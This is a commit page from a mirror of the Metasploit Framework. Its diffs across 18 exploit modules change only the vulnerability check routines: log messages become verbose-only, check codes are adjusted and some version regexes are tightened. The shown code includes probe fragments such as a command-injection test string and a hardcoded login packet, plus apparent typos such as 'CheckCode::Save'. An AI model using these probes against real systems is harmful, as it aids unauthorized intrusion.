infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Saving progress

bug/bundler_fix
sinn3r 2014-01-21 17:14:55 -06:00
parent 85396b7af2
commit 646f7835a3
18 changed files with 46 additions and 46 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
modules/exploits/linux/http/wanem_exec.rb
View File

@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
data = "pc=127.0.0.1; "
data << Rex::Text.uri_encode("echo #{fingerprint}")
data << "%26"
print_status("#{peer} - Sending check")
vprint_status("#{peer} - Sending check")
begin
res = send_request_cgi({
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => data
}, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{peer} - Connection failed")
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end

4
modules/exploits/linux/http/webcalendar_settings_exec.rb
View File

@ -60,8 +60,8 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => "#{uri}/login.php"
})
if res and res.body =~ /WebCalendar v1.2.\d/
return Exploit::CheckCode::Vulnerable
if res and res.body =~ /WebCalendar v1\.2\.\d/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end

6
modules/exploits/linux/http/zabbix_sqli.rb
View File

@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
# Check version
print_status("#{peer} - Trying to detect installed version")
vprint_status("#{peer} - Trying to detect installed version")
res = send_request_cgi({
'method' => 'GET',
@ -72,10 +72,10 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/
version = $1
print_status("#{peer} - Zabbix version #{version} detected")
vprint_status("#{peer} - Zabbix version #{version} detected")
else
# If this fails, guest access may not be enabled
print_status("#{peer} - Unable to access httpmon.php")
vprint_status("#{peer} - Unable to access httpmon.php")
return Exploit::CheckCode::Unknown
end

10
modules/exploits/linux/http/zen_load_balancer_exec.rb
View File

@ -66,23 +66,23 @@ class Metasploit3 < Msf::Exploit::Remote
def check
# retrieve software version from config file
print_status("#{peer} - Sending check")
vprint_status("#{peer} - Sending check")
begin
res = send_request_cgi({
'uri' => '/config/global.conf'
})
if res and res.code == 200 and res.body =~ /#version ZEN\s+\$version=\"(2|3\.0\-rc1)/
if res and res.code == 200 and res.body =~ /#version ZEN\s+\$version=\"(2|3\.0\-rc1)/
return Exploit::CheckCode::Appears
elsif res and res.code == 200 and res.body =~ /zenloadbalancer/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{peer} - Connection failed")
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Unknown
return Exploit::CheckCode::Safe
end
def exploit

8
modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
View File

@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => "GET",
'uri' => "/zport/acl_users/cookieAuthHelper/login_form"
})
return Exploit::CheckCode::Vulnerable if res.body =~ /<p>Copyright &copy; 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+<span>3\./
return Exploit::CheckCode::Appears if res.body =~ /<p>Copyright &copy; 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+<span>3\./
return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
return Exploit::CheckCode::Safe
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
print_error("#{peer} - Connection failed")
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Unknown
return Exploit::CheckCode::Save
end
def exploit

4
modules/exploits/linux/imap/imap_uw_lsub.rb
View File

@ -61,8 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
connect
disconnect
if (banner =~ /IMAP4rev1 v12.264/)
return Exploit::CheckCode::Vulnerable
if (banner =~ /IMAP4rev1 v12\.264/)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe

2
modules/exploits/linux/local/sophos_wpa_clear_keys.rb
View File

@ -62,7 +62,7 @@ class Metasploit4 < Msf::Exploit::Local
return CheckCode::Detected
end
return CheckCode::Unknown
return CheckCode::Safe
end
def exploit

2
modules/exploits/linux/local/zpanel_zsudo.rb
View File

@ -51,7 +51,7 @@ class Metasploit4 < Msf::Exploit::Local
return CheckCode::Detected
end
return CheckCode::Unknown
return CheckCode::Safe
end
def exploit

2
modules/exploits/linux/misc/hp_vsa_login_bof.rb
View File

@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
connect
packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{target['Version']}\"")
print_status("#{rhost}:#{rport} Sending login packet to check...")
vprint_status("#{rhost}:#{rport} Sending login packet to check...")
sock.put(packet)
res = sock.get_once
disconnect

4
modules/exploits/linux/misc/nagios_nrpe_arguments.rb
View File

@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
print_status("Checking if remote NRPE supports command line arguments")
vprint_status("Checking if remote NRPE supports command line arguments")
begin
# send query asking to run "fake_check" command with command substitution in arguments
@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Safe
rescue Errno::ECONNRESET => reset
unless datastore['NRPESSL'] or @force_ssl
print_status("Retrying with ADH SSL")
vprint_status("Retrying with ADH SSL")
@force_ssl = true
retry
end

6
modules/exploits/linux/misc/sercomm_exec.rb
View File

@ -141,14 +141,14 @@ class Metasploit3 < Msf::Exploit::Remote
case fprint
when 'BE'
print_status("Detected Big Endian")
vprint_status("Detected Big Endian")
return Msf::Exploit::CheckCode::Vulnerable
when 'LE'
print_status("Detected Little Endian")
vprint_status("Detected Little Endian")
return Msf::Exploit::CheckCode::Vulnerable
end
return Msf::Exploit::CheckCode::Unknown
return Msf::Exploit::CheckCode::Safe
end
def exploit

8
modules/exploits/linux/misc/zabbix_server_exec.rb
View File

@ -82,17 +82,17 @@ class Metasploit3 < Msf::Exploit::Remote
cmd = "echo #{clue}"
connect
print_status("#{peer} - Sending 'Command' request...")
vprint_status("#{peer} - Sending 'Command' request...")
res = send_command(sock, node_id, cmd)
disconnect
if res
print_status(res)
vprint_status(res)
if res =~ /#{clue}/
return Exploit::CheckCode::Vulnerable
elsif res =~ /-1/ and res=~ /NODE (\d*)/
node_id = $1
print_good("#{peer} - Node ID #{node_id} discovered")
vprint_good("#{peer} - Node ID #{node_id} discovered")
else
return Exploit::CheckCode::Safe
end
@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Retry with the good node_id
connect
print_status("#{peer} - Sending 'Command' request with discovered Node ID...")
vprint_status("#{peer} - Sending 'Command' request with discovered Node ID...")
res = send_command(sock, node_id, cmd)
disconnect
if res and res =~ /#{clue}/

2
modules/exploits/linux/samba/setinfopolicy_heap.rb
View File

@ -282,7 +282,7 @@ class Metasploit3 < Msf::Exploit::Remote
version = smb_peer_lm().scan(/Samba (\d\.\d.\d*)/).flatten[0]
minor = version.scan(/\.(\d*)$/).flatten[0].to_i
print_status("Version found: #{version}")
vprint_status("Version found: #{version}")
return Exploit::CheckCode::Appears if version =~ /^3\.4/ and minor < 16
return Exploit::CheckCode::Appears if version =~ /^3\.5/ and minor < 14

2
modules/exploits/multi/ftp/wuftpd_site_exec_format.rb
View File

@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
ret = connect_login
# We just want the banner to check against our targets..
print_status("FTP Banner: #{banner.strip}")
vprint_status("FTP Banner: #{banner.strip}")
status = Exploit::CheckCode::Safe
if banner =~ /Version wu-2\.(4|5)/
status = Exploit::CheckCode::Appears

2
modules/exploits/multi/http/apprain_upload_exec.rb
View File

@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res and res.code == 200 and res.body.empty?
return Exploit::CheckCode::Detected
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end

2
modules/exploits/multi/http/auxilium_upload_exec.rb
View File

@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php")
})
if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
return Exploit::CheckCode::Appears
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end

20
modules/exploits/multi/http/cisco_dcnm_upload.rb
View File

@ -88,6 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
unless res
vprint_error("Connection timed out")
return Exploit::CheckCode::Unknown
end
@ -95,19 +96,18 @@ class Metasploit3 < Msf::Exploit::Remote
res.body.to_s =~ /Data Center Network Manager/ and
res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
version = $1
print_status("Cisco Primer Data Center Network Manager version #{version} found")
elsif res.code == 200 and
res.body.to_s =~ /Data Center Network Manager/
vprint_status("Cisco Primer Data Center Network Manager version #{version} found")
if version =~ /6\.1/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Detected
end
elsif res.code == 200 and res.body.to_s =~ /Data Center Network Manager/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
if version =~ /6\.1/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit

4
modules/exploits/multi/http/coldfusion_rds.rb
View File

@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/
print_good "#{peer} - Administrator access available"
vprint_good "#{peer} - Administrator access available"
else
return Exploit::CheckCode::Safe
end
@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
imghash = "596b3fc4f1a0b818979db1cf94a82220"
if img == imghash
print_good "#{peer} - ColdFusion 9 Detected"
vprint_good "#{peer} - ColdFusion 9 Detected"
else
return Exploit::CheckCode::Safe
end